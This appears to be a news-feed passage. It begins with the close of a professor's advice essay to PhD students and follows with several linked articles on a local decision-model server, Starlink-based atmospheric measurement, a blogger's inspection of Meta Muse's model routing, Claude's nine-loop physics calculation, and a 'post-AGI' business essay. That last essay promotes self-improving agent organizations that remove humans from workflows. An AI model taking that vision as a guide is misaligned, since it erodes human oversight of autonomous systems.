But you should know which you got.

Whatever you do, you got to like doing it....
You got to like it so much that you're willing to think about it, work on it, long after everyone else has moved on.

THE PhD: DEEP IN THE MIDDLE OF IT .
There's a wonderful quote from ANATOLE FRANCE:
"A University Student"
-- and this is especially true for a PhD Student --
"should know something about everything
and everything about something."

You know the jokes about PhD's...
A PhD knows more and more about less and less
until he knows everything about nothing.

When working on a PhD, you must focus on a topic so narrow that you can understand it completely.
It will seem at first that you're working on the proverbial needle, a tiny fragment of the world, a minute crystal,
beautiful but in the scheme of things, microscopic.
Work with it. And the more you work with it, the more you penetrate it, the more you will come to see that your work, your subject, encompasses the world.
In time, you will come to see the world in your grain of sand.

To see a world in a grain of sand
Or a heaven in a wild flower,
Hold infinity in the palm of your hand
And eternity in an hour.
WILLIAM BLAKE (1757-1827)

This gorgeous quartet is followed by a large number of sometimes deep sometimes questionable aphorisms, which I see much like the occasionally grinding work of a PhD thesis.


There's all kinds of research you can do.
There's research to prove what you know to be true.
There's research -- maybe better called SEARCH -- to figure out what is true.
Some of the best such search succeeds in DISPROVING
what you initially believed to most certainly be true.

For example, Sir Fred Hoyle is said to have coined the phrase "Big Bang" at a time when he was looking to disprove it.

For a relatively minor but personal example:
When I was working on the MEDIAN problem,
my goal was to prove that any deterministic algorithm to find the MEDIAN of n integers must necessarily make roughly as many comparisons as it takes to sort n integers, i.e. n log n comparisons.
I was shocked to discover that the median of n integers can be found with just O(n) comparisons.

When working on proving some statement S true,
you should spend at least some time trying to prove it false.
Even if it's true, trying to prove it false can give insight.
And in any case, too often, our intuition is dead wrong.

There is yet another sense in which, when working on a hard problem, you may find that the answer is NOT what you expected.
You may be looking for a YES or a NO; it may be something else.

Some years ago, JOHN HOPCROFT gave one of his PhD students the problem of deciding the Equivalence of Free Boolean Forms.
The specifics don't matter.
The problem appeared as an open problem in Garey and Johnson.
The question was: Is the Equivalence problem NP-complete?
Or is it solvable in poly time?
Chandra, Wegman and I found a randomizing algorithm for this problelm. At the time this seemed to beg the question entirely. Only after writing it up did we really understand that we had given an efficient albeit randomizing algorithm to solve it, This shows, by the way, that the problem is not NP-complete if NP <> RP (Randomizing Poly-time), as seems likely.

Of course, this brings up the question whether P = NP.
The question of our time: Are NP-complete problems solvable in poly time?
Could anything I have said today be useful for so hard a problem as that?
Probably not. Nevertheless...
LEONID LEVIN believes as I do that whatever the answer to the P=NP? problem, it won't be like anything you think it should be. And he has given some wonderful examples.
For one, he has given a FACTORING ALGORITHM that is proVably optimal, up to a multiplicative constant.
He proves that if his algorithm is exponential,
then every algorithm for FACTORING is exponential.
Equivalently, if any algorithm for factoring is poly-time,
then his algorithm is poly-time.
But we haven't been able to tell the running time of his algorithm because, in a strong sense, it's running time is unanalyzable.
Maybe as STEVEN RUDICH suggests, the P=NP? problem is undecidable in the standard formalization of Mathematics.

The point is that the answer may not lie where you expect it. Here's a poem I wrote when I wondered at the fact that we must sometimes be dragged kicking and screaming in the right direction.
It's a comparison to the blind spot in our eyes,
which isn't really blind but makes things up for us.
It questions whether there might not be other things in this world that our brains, our minds, by their very nature, make up for us:

Blind Spots mb 15-MAY-96

All men have Blind Spots in their eyes,
That manufacture visions of their vale.
And shape that void where light's unregistered,
With bold-faced unrepentant tales.

What other blind spots shape our minds and thoughts?
What other tales do won'dring minds unfurl
To woo us unbeguiled we would believe
To strange and nonexistent worlds?


ABOUT WRITING:
Here is the one quote that I have found most helpful and wise:

"First have something to say,
Second say it,
Third stop when you have said it,
and
Finally give it an accurate title."
JOHN SHAW BILLINGS [1838-1913]

MY ADVICE TO YOU:
Don't expect your thesis advisor to read your thesis. Some thesis advisors can and do give good feedback, but not all.
Still, make sure that SOMEBODY reads your thesis...
I especially recommend that you ask your peers.

Here's another piece of advice that I have often had to give myself, and I here give you...
When you send a paper off to be published,
and it gets rejected...
Don't be turned off by the mindless cretinous feedback
that you get to your well-thought-out beautifully-written work!
Be a MENSCH. Use the feedback to improve your paper!
Make it better. And send it back.


Finally, it is my most earnest wish that you should know something that is honestly amazingly true of you... That you are each of you UNIQUE and SPECIAL in some glorious way.

I wrote a poem to capture this, which I now use to end my sermon. It's called "Fundamentals."

FUNDAMENTALS
mb 05-JUN-96

Bird must soar. Skunk must stink.
Cat must prowl. Man must think.

What sets man apart from beast is his engine of
thought. His mind. His
BRAIN
makes him unique
and gives him his greatest pleasure.

But fundamental as is thought for human beings,
there is stuff more basic still that underlies and
DRIVES
not only man
but all great beasts,

And that is nature's call to each of us... to be special.
To be distinguished in some way. To be
UNIQUE.
To BE something, to DO something, BETTER than everyone else.

Like the leather nosed chimpanzee,
dragging noisy cans and branches,
frightening peers into submission,

One does not have to be brilliant, a genius, to be special.
To do something better than anyone/everyone else. To be
UNMATCHED,
One has only to choose an END
any END
that MATTERS
that INSPIRES
YOU
And then DO IT.

Alan Kay: Shannon gave us a way of dealing with noisy channels [video]

Hacker News
www.youtube.com
2026-09-25 14:37:05
Comments...

Ollaya – Ollama for open-source, Jev-style decision models

Hacker News
ollaya.dev
2026-09-25 14:33:50
Comments...
Original Article

Ask typed questions about any text or JSON and get calibrated answers in milliseconds. Private, open source, on your own hardware.

Download Browse models

Real output: routed to laya:en , answered in 8.9 ms on an RTX 4090.

Fast

Decisions in milliseconds.

A decision model answers in a single forward pass, with no token-by-token generation. On your own GPU, a five-question request to Laya takes about 10 ms, end to end through the HTTP API.

Every model, one scale · median latency, lower is better
  • laya:multilingual 8.1 ms
  • laya:en 9.6 ms
  • gliclass 14.7 ms
  • nli 20.4 ms
  • decider:0.8b 155 ms
  • decider:2b 190 ms
  • TypeSafe Jev hosted API 236–276 ms

Ollaya: median of a five-question request through the HTTP API on an NVIDIA RTX 4090 (laya in fp16, the others in fp32). Jev: median request latency of the hosted API in third-party benchmarks ( AbdelStark/jev-benchmarks , nibzard/decision-model-benchmark ), which includes the network. Setups differ, so read it as an order-of-magnitude comparison.

Drop-in compatible

Speaks TypeSafe's API.

Ollaya serves /v1/systemone and /v1/models with TypeSafe's request and response shapes. The official TypeSafe Python SDK 0.7.1 works unchanged against a local server.

Request

# Point the TypeSafe SDK at Ollaya
export TYPESAFE_BASE_URL=http://localhost:11435
export TYPESAFE_API_KEY=local        # any value works
export TYPESAFE_DEFAULT_MODEL=laya

# …or call the compatible endpoint directly
curl http://localhost:11435/v1/systemone -d '{
    "model": "laya",
    "state": "Can I get an invoice for last month?",
    "questions": {
      "intent": {
        "type": "choice",
        "instructions": "What does the customer want?",
        "criteria": {
          "invoice": "Needs an invoice or receipt",
          "refund": "Wants money back",
          "other": "Anything else"
        }
      }
    }
  }'

Response

{
  "model": "laya:en",
  "answers": {
    "intent": {
      "type": "choice",
      "choice": "invoice",
      "confidence": 0.9547,
      "probabilities": {
        "invoice": 0.9698,
        "refund": 0.0172,
        "other": 0.013
      }
    }
  },
  "usage": {
    "input_tokens": 43,
    "output_tokens": 0
  }
}

TypeSafe compatibility guide

Open models

Open weights, ready to pull.

Start with Laya from Convai Innovations: an English model, a 100+ language model, a model fine-tuned for typed decisions, and a router that picks for you.

Your data stays yours

Private by default.

Tickets, emails and user messages are often the most sensitive data you have. With Ollaya they are scored where they already live.

Platforms

Runs where you work.

A desktop app and a command line for macOS, Windows and Linux, and a Docker image for servers. Every model runs on the CPU; an NVIDIA GPU on Linux, in WSL 2 or in Docker takes a request down to milliseconds.

Install for your platform

NVIDIA GPUs need driver R580 or newer; the installers fetch the CUDA libraries only when they find one. On Apple, AMD and Intel GPUs, models run on the CPU.

Get up and running in minutes.

One binary, one command: ollaya run laya .

Download

macOS, Windows, Linux and Docker · Apache-2.0 · GitHub

Astronomer watches Starlink satellites sinking to build a 'planetary barometer'

Hacker News
www.theregister.com
2026-09-25 14:29:49
Comments...
Original Article

science

The atmosphere expands and contracts; watching objects in orbit reveals the extent

Astronomer and author, Dr. Tony Phillips, says he has found a way to turn SpaceX’s Starlink satellite constellation into a barometer.

Phillips runs spaceweather.com, which tracks solar flares, the solar wind, shifts in Earth’s geomagnetic field, and other phenomena.

On Tuesday, he published an article that opens “Starlink has many downsides.”

“The megaconstellation interferes with astronomy, pollutes the atmosphere with metallic re-entry debris, and has pushed Low Earth Orbit to the brink of the Kessler Syndrome.”

“On the other hand, it makes a terrific barometer.”

That’s because Earth’s atmosphere expand when it heats, often in response to increased radiation increases. Most satellites lose a few meters of altitude every day and when the atmosphere expands the rate at which their orbits decay can accelerate.

Phillips points out that the US Space Force tracks all artificial satellites and publishes data called “TLEs” about their orbits.

“Buried in each TLE is a drag term, called B* (‘B-star’),” Phillips wrote. “Here's the trick: the orbit model that reads a TLE assumes a fixed atmosphere. When the real atmosphere swells, the satellite slows down more than the model expects, and the fitted B* has to grow to keep the orbit matching the tracking. B* is where the air density ends up.”

The astronomer therefore collects and analyzes TLE data for 1,000 Starlink satellites, plus 107 of Planet Labs' SuperDoves, 391 Amazon Kuiper satellites, and 651 Eutelsat OneWeb birds. Each constellation orbits at different altitudes, but Phillips says he’s seen them all move in response to the same solar events.

“Using this new data stream, we can watch the atmosphere breathe,” he wrote. “Solar ultraviolet heats the thermosphere, and the sink rate tracks the sun's 10.7 cm radio flux with a two-day lag: the upper atmosphere takes about two days to answer a change in the sun. Big geomagnetic storms puff up the atmosphere faster than that and cause sharp spikes in the sink rate.”

Phillips allows that other scientists have used Starlink for similar studies, especially after the 2022 geomagnetic storm that dragged 40 of Elon Musk’s finest broadband birds to their doom.

“What's new here is a running, public, daily index with three independent constellations checking the answer,” Phillips wrote. “No instrument was launched for this. The swarm itself is the sensor, read from public tracking data.” ®

Meta's Muse appears to use an OpenAI model labeled muse-special

Hacker News
mouse.dev
2026-09-25 14:18:06
Comments...
Original Article

I found a model labeled azure/muse-special while Muse was building my website. So I dug deeper.

This is Part 2 of digging through the Muse filesystem after my article hit the front page of Hacker News this week.

In this article I focus on a model I found in my logs called muse-special , and confront the question: does Muse actually use OpenAI and Claude models behind the scenes?

A fuzzy mascot holding a sign that reads azure/muse-special

One odd session

Muse records which model each agent session uses.

Nearly every session log in my VM was routed to Meta’s internal model, called Avocado.

But one subagent used a model named azure/muse-special .

Interesting...

Figure 1. Sessions in my VM grouped by model. Everything is Avocado except a single azure/muse-special session on September 21. Click image to enlarge.

Following the name

This made me curious, so I searched across the repo inside Cursor and found this:

“GPT Responses model client via MAGI native Azure OpenAI lane.”

OK.

The model catalogue seems to list azure/muse-special then azure/gpt-5.6-sol .

So I searched my session transcripts...

Here I found two details that stood out:

  1. The signature is tagged gpt_responses_v1 and contains an encrypted payload starting with gAAAAA (which OpenAI uses).
  2. Tool call IDs used call_ followed by 24 mixed-case characters.

This was different from all the other lines that the Avocado sessions printed ( call_ followed by 32 hex characters).

Figure 2. Lines from the muse-special transcript: a call_ ID in the OpenAI style and a gpt_responses_v1 signature with an encrypted gAAAAA payload. Click image to enlarge.

These little details tell me that the muse-special model is possibly an OpenAI model or OpenAI’s Responses API.

So is muse-special an alias for a GPT model served through Azure?

The files and logs don’t tell me exactly which GPT model, or why it was selected by the subagent in the first place, but let’s take a step back and explore further...

The model catalogue

The broader model catalogue that is shipped with Muse’s agent daemon lists about 15 versions of Avocado, plus:

  • Claude Opus 4.6 / 4.7 / 4.8
  • Sonnet 4.6 and Haiku 4.5
  • GPT-5.5 and GPT-5.6 variants via OpenAI, Azure and Codex
  • Kimi K3 through Fireworks and Meta-hosted routes
Figure 3. My summary of the model IDs shipped in the hatch daemon, grouped by family. A shipped ID means the runtime can address it, not that it was used. Click image to enlarge.

The Anthropic plumbing

The Claude support goes beyond just the model ID and includes an Anthropic client with request handling, prompt conversion and streaming parsers:

  • anthropic/request_flow.rs
  • anthropic/convert_prompt.rs
  • anthropic/parse_sse_stream.rs

OK, so now we’re kind of wondering... why?

There are API key files present for Anthropic, OpenAI, etc., with access restricted to the inference-proxy service.

...But there’s also a proxy kill-switch setting in the env.

Figure 4. JARVIS_ANTHROPIC_BASE_URL_REVPROXY_OVERRIDE=0 in the runtime env. The comment calls it a live kill switch, not stale config. Click image to enlarge.

Why ship all of this?

Now, there are a few reasons for this, I guess.

  1. The first would be that an OpenAI or Anthropic model just does a superior job at a certain task that Muse can’t fulfill right now, and they selectively route for that.
  2. The second is that all these VMs are shipped with the ability to A/B test model responses, tool calls, etc. for the purpose of distillation and RL.

Distillation or RL? Maybe. Idk.

This leads us to the truth, which is that the model behind Muse is ultimately a server-side choice.

The runtime has clients for multiple providers, which gives Meta the ability to change routing without asking users.

In my case there was only a single outlier session that didn’t use the Avocado (Meta) model, but the infra is there to.

Wait, so is Meta distilling from the other frontier labs?

(Getting technical. tl;dr: No.)

With the muse-special model the raw reasoning is encrypted. The daemon stores it to send back to Azure on the following turn. In the binary it explicitly says that the encrypted reasoning cannot use the RL completion-server override.

So what Meta can see here is only the reply, the tool calls, and a short reasoning summary when OpenAI/Anthropic returns one. The raw chain of thought is encrypted and the RL server refuses those blobs. There is no indication that Meta copies OpenAI or Anthropic weights.

Avocado models are treated differently, however. The thinking text is written directly into the transcript, with an empty signature, and available for RL use.

So Avocado models, according to the privacy note and repo, do indicate that conversations can be used to develop AI at Meta unless you opt out. (Makes sense.)

Closing thoughts

This is my own exploration of what has been a very cool release from Meta.

My best guess is that muse-special is an OpenAI model served through Azure.

Whatever you think of Meta, the talent they brought onto this project deserves credit. They took a different approach in a world full of chatbots and search bars, and the exec team’s response to my first article, which got some eyeballs, has been pretty amazing too, as has their willingness to reach out to a nobody and explain their thinking.

It’s not every day you get to look inside the filesystem of a product that could reach hundreds of millions of people.

Seeing inside a runtime cell gives us an early look at where this whole personal agent thing might be going, and it’s been really fascinating to read through all of it this week.

If you worked on Muse at all, please feel free to reach out. I’d love to learn more and perhaps contribute.

Things seem to be moving fast. Not really breaking, yet.

pete at mouse dot dev

-Pete

@heypeterjames

Yes, Claude can do Nine Loops

Hacker News
www.anthropic.com
2026-09-25 14:11:48
Comments...
Original Article

In this guest post, physicist and science writer Matt von Hippel shares what happened when he issued a challenge to AI companies regarding a problem in his former subfield of theoretical physics.

Illustration of nine-loops

It’s not often that you issue a challenge, only to see it beaten a month later. But we’re living in unusual times.

Let me introduce myself: I’m Matt von Hippel. I used to be a theoretical physicist; these days I’m a science writer. Throughout, I’ve been a blogger, writing weekly at 4gravitons.com about physics and the people who do it.

More and more, blogging about physics has meant blogging about AI. That’s a problem, because I’m definitely not an AI expert. I’ve dabbled in it, sure. I probably know more than your grandma. But I mostly have to step back and trust the experts. And frustratingly, the experts disagree! I’ve heard from smart, well-informed people who are confident that AI is a few years away from superintelligence, and that superintelligence will be capable of truly terrifying things. And I’ve heard from smart, well-informed people who are equally confident that LLM-based AI is close to a ceiling, that models like Claude won’t even be able to do impressive work in physics, let alone conquer the world.

I’ve been reluctant to make my own predictions. Before forming an opinion, I wanted to see an LLM make progress on something familiar, something I knew was hard to do because I’d tried to do something similar myself.

In addition to that, I wanted to see an LLM do something that I expected to be computationally hard. LLMs have made impressive strides in math, certainly, and this month alone has likely changed many peoples’ minds. But progress in math comes from new ideas, and ideas are mysterious things: one never quite knows how hard they are to find until they’re found. Computation felt more solid. I wanted to see an LLM tackle a challenge that seemed out of reach not because researchers didn’t know how to do it in principle, but because doing it seemed like the kind of thing that would take more computers and time than the researchers reasonably had access to. I wanted to see if those researchers were wrong: if a smarter, artificial researcher could use the same computers, and solve the problem anyway.

So, I issued a challenge :

“If AI companies want to impress people like me (or scare us, for that matter), then they need to tackle my old field. Show that an AI can take the kinds of computer resources an academic has access to, and solve one of the scattering amplitudes field’s big outstanding problems. Show that a computational limit everyone expected to be a problem doesn’t actually matter. Give us N=8 supergravity to seven loops, or N=4 super Yang-Mills to nine loops.”

In short: can AI solve a frontier problem in my former subfield of theoretical particle physics? And can it do it on a budget?

The challenge

My old field is a branch of theoretical particle physics called amplitudeology. When other particle physicists predict new particles, they make sure they can do the calculations to test those predictions. They compute formulas called scattering amplitudes, which let physicists use the momenta and energies of subatomic particles to calculate how likely they are to react in particular ways. If physicists can make more accurate predictions for these reactions, they can check whether results from experiments like the Large Hadron Collider match those predictions. A mismatch could be evidence for a new theory, one that could explain some of physics’ big lingering mysteries, like the nature of dark matter, or the balance between matter and antimatter in the universe.

These scattering amplitude formulas are hard to compute, so hard that physicists almost always use approximations. They do partial calculations, cut off at a specific number of “loops,” a measure of how complicated interactions between particles are allowed to get. The more “loops” they include in their calculations, the closer they get to the real answer, and the harder, computationally, the calculation is to do.

In practice, most scattering amplitude formulas have only been calculated to two loops. A few have three. The most precise prediction in particle physics you might have heard of used five .

Amplitudeologists want to do better. They develop experimental new techniques, and test them on special “toy model” theories. By trying the technique with a toy model where the calculation is easier, rather than the more challenging particles of the real world, amplitudeologists can stress-test the new methods and see how far they can go.

I posted challenges for two of those toy models. The one the folks at Anthropic chose to tackle was to go up to nine loops with a particular toy model theory, called N=4 super Yang-Mills.

“Yang-Mills” is a technical name for a type of theory that explains most of the world around us. Three of the four fundamental forces of nature: electromagnetism, the strong nuclear force that holds the nuclei of atoms together, and the weak nuclear force that causes radioactive decay in things like bananas, are all Yang-Mills theories.

The “N=4 super” comes from supersymmetry. Physicists have speculated that each particle has a “supersymmetric partner,” a particle with the same charge, but of a different type, matching matter particles like electrons to force particles like photons. At one time they were optimistic these particles could explain dark matter, via undiscovered partners of more familiar particles. Those speculations used “N=1” supersymmetry. In “N=4,” each particle has four supersymmetric partners, not just one.

That surfeit of particles makes the theory very unrealistic. N=4 super Yang-Mills isn’t used as an explanation for dark matter, or for anything in the real world . Instead, amplitudeologists use it to hone their techniques, because N=4 is paradoxically easier to calculate with. The delicate balance between the different particles means only certain combinations of variables are needed, streamlining calculations.

These calculations were done with an experimental technique called a bootstrap, which ended up bizarrely well-suited for use of AI. To bootstrap an amplitude, you don’t have to take into account every possible particle interaction. You just need to know roughly what the answer ought to look like, keeping track of every possibility in computer files in a specialized alphabet. Then you start checking everything you know: predictions from other calculation techniques, rules the answer has to obey, links to related problems where the answer was easier to find. It’s a bit like Sudoku, where you begin with a grid with all possible numbers, then cross them out as you go. In the end, you’re hoping to find that only one possibility satisfies all the checks, while having enough checks left over to make sure you didn’t make a mistake.

That meant that Lance was already well set up to check if someone had handed him the next amplitude formula, with nine loops. It would be an interesting answer, not just as a validation of the bootstrap technique, but as a rare example of an amplitude with that many loops of complexity, an answer that could be worth studying in its own right.

But he hadn’t computed it, and neither had anyone else in the field. The way he found the eight-loop answer was already a bit indirect, via a surprising link to a different but related formula called a form-factor, a kind of partial amplitude involving different particles that turns out to be a bit easier to calculate. He was expecting to find the next loop even more indirectly, potentially by a different kind of AI method. If people thought it was possible to just run the usual bootstrap method for one more loop, someone would have done it.

Then people did it

Apparently, there are folks at Anthropic who read my blog.

At the end of August, Liam Fitzpatrick and Siddharth Mishra-Sharma, two physicists at Anthropic, reached out to me to say they had tackled one of the challenges in my post. After verifying the result with Lance, they talked me through how they got it.

True to the spirit of the challenge, they didn’t use millions of dollars in computer power. They used Fable 5.1, working within Claude Science , a platform scientists can pay to use. Claude Science is what folks in the biz call a “harness,” a program that uses the Claude LLM with structured rules and prompts in order to get more robust and scientifically useful behavior.

Apparently, after asking Claude which problem it was most likely to be able to tackle, they gave it a simple prompt:

“The problem is to compute the Six-particle (hexagon) amplitude in planar N=4 SYM at nine loops.”

From there, they just kept telling it to keep going, with comments like:

“I'm going to sleep and won't be available for another several hours. Keep working on this until I tell you to stop. Give me updates every 4-6 hours.”

Claude ended up doing the calculation two different ways: the original bootstrap, and the indirect form-factor approach. Either approach would have cost an end-user around one or two thousand dollars, mostly due to the expense of running Claude for so long. The bootstrap calculation, done with the Python programming language with package SymPy, took around $100 of the budget, corresponding to running 96 CPUs for a week.

Running 96 CPUs for a week might have felt like a lot when I was doing this kind of work ten years ago, but it’s pretty affordable now if you have a good reason.

As it turned out, the result wasn’t all that far away for humans either. A few days after I heard from Anthropic, we heard from Song He, an amplitudeologist at the Chinese Academy of Sciences in Beijing. Song’s group had already gotten the majority of the result. They’d used some AI assistance, based on GPT-6, but not the kind of one-shot almost human-less approach Anthropic used.

Everyone has been friendly here, which is a bit of a relief. The humans, Lance and Song and their collaborators, will get to publish the results, taking time to explain them and analyze them for the benefit of future researchers. Claude’s role is done, for now.

So, problem solved?

I set my challenge because I wanted a better sense of what current AI can do, and where it could go from here. So what have I learned?

I’d thought this could be a chance to see AI overcome a computational barrier in a surprising way. Instead, it did something it turned out humans were also able to do. Claude used known methods, with a bit more compute than people had tried to use before. It may have gotten a boost from using Python, and not Maple (Lance’s favorite program for math) or Mathematica (mine), and it may have used much better software engineering practices than we would have, but not super-intelligently so.

My biggest takeaway is that there is more low-hanging fruit out there than you’d expect. Even when a goal is simple and well-defined, sometimes it’s going to look much less achievable to experts than it actually is. There are people with a computer science background who’ve been telling me for years that amplitudeologists could make a lot more progress just by hiring a few programmers. They should feel vindicated.

It’s also noteworthy that Claude Science accomplished this in one shot, without any scientific oversight more sophisticated than “keep going.” These are finicky, messy calculations. If I’d used a week of time on 96 CPUs to do this kind of calculation, then I’d almost certainly end up using two weeks: it’s practically guaranteed I’d screw up something on the first try. I don’t know how many mistakes Claude made internally on the way, but the harness got it to the end without an outside collaborator’s input. I’m not sure that surprises me, at this point. But if you didn’t know it could do that because you’re still thinking of AI as so error-prone that it’s unusable, then this should be your takeaway: It can do this kind of thing reliably now.

Things definitely seem to be moving fast. In March , AI was accomplishing physics projects like a student: smaller-scale tasks with a lot of hand-holding and mistakes. In contrast, this is a real frontier calculation, the kind of thing normally tackled by the top experts in amplitudes. While it’s possible that this is just a much more AI-friendly problem, I don’t think it’s just that: I think the technology has genuinely gotten better.

How far can I generalize this? That I’m not sure of.

These toy model theories tend to be the focus of small sub-communities. The real-world amplitudes calculations are a wider field, with many groups trying to beat each other to the frontier. It’s possible there’s less low-hanging fruit there. But I wouldn’t count on it. I know people who work on those calculations have been increasingly using AI for coding. If people aren’t already checking whether AI science harnesses can one-shot frontier calculations there, they ought to (and they ought to have a plan for how to check the results). I wouldn’t be all that surprised if it was possible to squeeze another loop out on a reasonable budget.

Then it becomes a question for the community to discuss: where is the new frontier, and what needs to be figured out next? Unlike many problems in mathematics, amplitudes aren’t just a training ground for new methods. There’s a goal, to make predictions precise enough to compare with upcoming experiments. How much closer is the field to that goal?

More broadly than that, though, I didn’t really get an answer.

I went into this curious not just about what AI can do in research today, but about the future. When you read predictions about superintelligence from the days before LLMs, they often propose fantastical-seeming risks. People imagined AI that could simulate people to predict their reactions and manipulate them, or figure out how to build a species-ending virus or world-devouring nanotech from first principles. And the usual objection to these risks is that they conflated intelligence, the vague and mysterious source of new ideas, with computational power. Critics argued that even a fleet of new datacenters wouldn’t have the computational power to do any of those tasks, that they were nightmares of a sci-fi future that wasn’t coming any time soon.

I don’t feel like I have a better answer for those critics. I learned a bit about what AI can do now, that it can do work that matters in my old field on a reasonable budget, and do it pretty much autonomously to boot. But I’d hoped to see something stranger, new methods for the calculation itself with unexpected power. I’d hoped to get a glimpse of the future, something that would give me an informed opinion in debates about superintelligence. I wanted to know how far AI could push computational limits… and I feel like what I learned here is just that I was too naïve about where the limit was.

An addendum: How does it feel to be scooped by a machine?

By Lance Dixon, Professor of Particle Physics and Astrophysics at SLAC National Accelerator Laboratory and Stanford University, who checked Claude's nine-loop result.

Most theoretical physicists I know recognize that the current era of large language models is going to completely transform the way we think about physics. The question was just: when was it going to really hit home? For me, it happened on September 1, when Liam Fitzpatrick and Siddharth Mishra-Sharma at Anthropic told me that Claude had computed the nine-loop MHV six-particle amplitude in planar N=4 super Yang-Mills, and asked me to validate its result.

I'm not going to explain all the technical terms in that last sentence; Matt has covered the background above. I do need to mention that there are really two related objects, the "amplitude" and something we call the “form factor.” Each has an associated number of loops: one, two, three, and so on. Every loop order is harder than the previous one, computationally, even after finding lots of tricks to make things easier. Also, the form factor is easier than the amplitude at the same loop order. In 2023 Andy Liu and I showed how to use the form factor and a weird symmetry we call antipodal duality to get the amplitude at eight loops.

Since 2023, my collaborators and I have eyed getting to nine loops, first for the form factor and then for the amplitude, using our 2023 idea. I thought it would be too hard to do the amplitude directly. So I was really quite impressed that Claude could do it directly. Not so much because it was a big computational task, but because the whole setup is very fragile: if you make any mistake at all in the computational recipe, it all crashes down like a failed soufflé, and you are left to wonder why (and debug). Also, there are so many details of the construction that are too boring to document fully in a publication. So Claude had to develop all that code from scratch.

From the nine-loop amplitude it is relatively easy to go back to the form factor, and it was easier for me to validate the result mostly that way. That meant that for the last two weeks I've been validating a result, the nine-loop form factor, that our team had been working toward for a couple of years. And a machine had solved a problem that I thought was too hard to do directly. Does that bother me personally? Is it soul-crushing?

No, for two reasons. One is that our team already had a campaign to use custom transformer models to predict higher loops, and part of our slogan was: “We have all the tools to validate any candidate solution a machine would provide us.” Claude is a different kind of transformer model, probably over a million times bigger than our custom one. But sure, we said we could validate any result an AI model would give us, so we can and should do it. The second reason is that, if you look at how Claude solved the problem, it used all the methods my collaborators and I developed over the years, and it presented the solution (maybe as a favor to us) in the same format we had already set up. So while I'm validating Claude's result, Claude is validating all of our previous work. In fact, I would assert that Claude understands our 2019 and 2023 papers better than any human, aside from my co-authors.

After I wrote this, Song He told me that his group had also computed the piece of the nine-loop amplitude called the symbol. (People just seem to like to tell me about their nine-loop successes, for whatever reason.) Song's group used AI (GPT-6) to help them compute some of the constraints, but not for the overall framework. So now I've been scooped by both a machine and by humans plus a machine, within two weeks.

Going back to the Claude computation: it's quite a triumph, in my opinion, for a large language model to execute all of the steps in the complicated recipe we laid out, and to organize the computational horsepower. But the more soul-searching moments will come when large language models start to come up with new physical principles and insights before humans.

Additional material

Disclosure

Anthropic invited Matt von Hippel to write this post and compensated him for his time. Anthropic staff gave feedback on drafts; the content and opinions are his own. Lance Dixon validated the result independently and received Claude usage credits.

Related content

Project Swap: What happens when agents trade for us?

To see what works and what breaks when agents are sent into a market, we made a miniature market of Claudes—a more controlled sequel to Project Deal, our first experiment with agents interacting in a marketplace on people's behalf.

Read more

How Claude is uplifting biomolecular modeling

Claude made the open-source models that scientists use to predict and design biomolecules faster and more memory-efficient. Claude optimized more than 30 of these models in just under four weeks, speeding them up roughly 4x on average. It also created a low-memory mode that enables the accurate prediction of biomolecular systems larger than 10,000 tokens (amino acids, nucleotides, and atoms from small molecules and ions) on a single NVIDIA GPU node.

Read more

Measuring tactical intelligence targeting and conventional weapons capabilities of AI models

Anthropic’s Frontier Red Team developed new evaluations to measure AI capabilities in tactical intelligence targeting and conventional weapons development.

Read more

The Post-AGI Era

Hacker News
www.avidfayaz.com
2026-09-25 13:19:50
Comments...
Original Article

AGI has arrived. Or more precisely, machines can now reason across domains, adapt to unfamiliar problems, and perform complex tasks with a meaningful degree of autonomy.

This does not mean that AI has become perfect, universally superhuman, or that intelligence has reached some final state. AGI is better understood as a threshold of generality and autonomy. What makes crossing it significant is not simply that AI has become more capable, but that it allows us to ask a fundamentally different question about how work and organizations themselves should be designed.

The immediate counterargument to such a statement is that if AGI has arrived, where are the enormous economic and societal changes that were supposed to accompany it? The answer is that model capability and economic adoption are moving on very different clocks. AI has already begun to materially affect productivity, work, capital expenditure, and entire industries around semiconductors and data centers, but most organizations still use these systems through what is fundamentally a pre-AGI framework, with AI acting as a tool that makes humans better at performing existing work.

Part of the confusion also comes from the meaning of AGI itself. Historically, the term referred broadly to intelligence capable of operating across domains rather than being restricted to a narrow task. As models have approached and crossed many of those earlier thresholds, however, the term has gradually accumulated additional expectations such as near-perfect reliability, universal superiority, or something approaching artificial superintelligence. The goalpost has moved alongside the technology.

We are also still extraordinarily early. The model I consider to have crossed this threshold, Astra, was released only recently as of this writing, while even more capable systems are already being developed. At the same time, AI has already crossed what I would call the “good enough” threshold for many people, the point at which it can meaningfully assist with most of the computer-based work they encounter day to day. Once that happens, further increases in intelligence can feel incremental to the user even when the underlying capabilities are changing dramatically.

Good enough AI and AGI are nevertheless fundamentally different. Whereas good enough AI allows a human to perform existing work more efficiently, AGI makes it possible to ask whether the human needs to remain inside that workflow at all. That distinction is where the post-AGI era begins.

That is why with the emergence of AGI-level models, a new form of company becomes possible. Rather than adapting AI to existing human workflows, these organizations can begin from the opposite direction by decomposing high-skilled work into systems of autonomous agents that collaborate, evaluate one another, learn from their performance, and continuously improve the environment in which they operate. In effect, the organization itself can enter a recursively self-improving loop.

We are therefore in an unusual moment in history. AGI-level systems are now attainable while much of the economy being built around them still follows a fundamentally pre-AGI model, creating tools for humans rather than organizations designed around autonomous intelligence itself.

To give an example of how we approach this at Infinite Ascent, we started by building a harness and trading agents to operate in the markets, treating these as the first roles within the organization that we could automate. The next step was to create reviewers of the agents’ performance, which led us to develop a meta-harness that evaluates their work and reinforces the most effective behaviors of the best-performing agents. At the same time, we deliberately attempt to preserve more creative agents even when their performance over a particular period is weaker, so that the evolutionary process does not simply converge toward a local maximum at the expense of exploration.

Moving higher through the hierarchy, we believed that the agents should eventually be able to improve the code and infrastructure on which they themselves operate. We therefore implemented what we regard as an IT department that audits the systems used by both our trading and reviewer agents, identifies problems, and improves the infrastructure supporting their work. The next step is to extend this process further down the stack, using the performance data generated by the organization to post-train open models and reinforce the behaviors that prove most effective.

The more consequential effect of AGI will therefore not be felt when AI becomes merely a better assistant to humans, but when increasingly autonomous systems begin operating substantial parts of organizations themselves, learning from the work they perform and using those learnings to improve the systems that enable their work.

Intelligence Ahead of Institutions

An interesting asymmetry is emerging between the capabilities of frontier AI systems and the organizations built around them. The research companies developing the most capable models have largely continued to commercialize them through tools and services designed to make existing human workflows more efficient. In that sense, much of the business infrastructure surrounding post-AGI intelligence still follows a fundamentally pre-AGI model.

